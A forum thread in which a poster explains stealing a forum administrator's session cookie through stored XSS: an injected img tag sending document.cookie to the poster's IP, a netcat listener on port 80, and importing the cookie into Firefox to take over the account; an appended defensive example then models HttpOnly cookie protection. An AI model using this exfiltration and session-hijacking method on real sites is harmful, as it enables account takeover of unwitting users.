cookie stolen and firefox

glubby
forum buddy
Posts: 19
Joined: 04 Apr 2008, 16:00

Post by glubby »

Hi guys,

I've got a pretty "mysterious" cookie matter. First, I wish to point out that I'm working on a test platform. I found and used an XSS attack to steal a cookie. :twisted: The problem is: how do I use it, so I can connect to the site with the victim's identity? The cookie was sent to my laptop and captured with netcat. I updated Firefox's cookie file. Since then, Firefox refuses to start. 8O Isn't there any other way? :roll:

rhysh
Fame ! Where are the chicks?!
Posts: 767
Joined: 15 Nov 2006, 17:00

Post by rhysh »

Just how did you get netcat to retrieve it?

Post by glubby »

On my machine I used: nc -l -p 80
When the victim loads the page, my JavaScript code adds an img tag which sends me the cookie on port 80. Then I've got it on my console in text format.... :D

But, I don't know how to use it. :(

Post by glubby »

Well then, I found the answer on my own. To add my cookies, I used the add-on "Add N Edit Cookie" :D

pseudo_opcode
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
Location: 127.0.0.1

Post by pseudo_opcode »

And would you like to throw some light on how you sent it to your server with JavaScript? It's interesting; due to the restrictions, you must have used your own implementation of sockets, or a way to send data to your server.
I would like to hear more about it, and I'm sure others would, too.

Post by glubby »

Well, it's just an XSS attack. I just put in an img tag with the source: http://@IP/document. cookie . I can't put the exact code on the forum, it's filtered. But I'm sure you can fill in the blank.
When the administrator goes to delete my post on the forum, his browser executes the code and sends the cookie data of his session to my computer. So, I used netcat, which is a "socket". So, as I explained before (nc -l -p 80), I received all the requests of my victim in my console, displayed in text mode. Then all that was left was to add it to my browser and connect back to the administrator account without entering any password.
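
The theft described in this thread works only because the session cookie is readable through document.cookie. The JavaScript below is an added example, not code from any poster: it models which cookies a page script can see when the session cookie is issued without and with the HttpOnly attribute. The cookie names and values and the helper names `parseSetCookie` and `scriptVisibleCookies` are constructed for illustration.

```javascript
// Added example: models which cookies a page script can read via document.cookie.
// Cookie names and values are constructed; helper names are hypothetical.

// Parse one Set-Cookie header value into its name, value and security attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim()).filter(Boolean);
  const eq = parts.length ? parts[0].indexOf('=') : -1;
  if (eq < 1) throw new Error('malformed Set-Cookie: ' + header);
  const cookie = {
    name: parts[0].slice(0, eq),
    value: parts[0].slice(eq + 1),
    httpOnly: false, secure: false, sameSite: null,
  };
  for (const attr of parts.slice(1)) {
    const [k, v = ''] = attr.split('=');
    const key = k.trim().toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = v.trim();
  }
  return cookie;
}

// What document.cookie would return: browsers leave HttpOnly cookies out of it.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(c => !c.httpOnly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// Weak: session id issued without HttpOnly, so any script on the page can read it.
const weak = ['sid=constructed-session-id; Path=/', 'theme=dark; Path=/'];

// Hardened: same session cookie with HttpOnly, Secure and SameSite set.
const hardened = [
  'sid=constructed-session-id; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];

console.log('weak     ->', scriptVisibleCookies(weak));
console.log('hardened ->', scriptVisibleCookies(hardened));
```

HttpOnly only keeps the session id out of script reach; the forum still has to encode user-submitted post content so the markup never executes in the administrator's browser.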
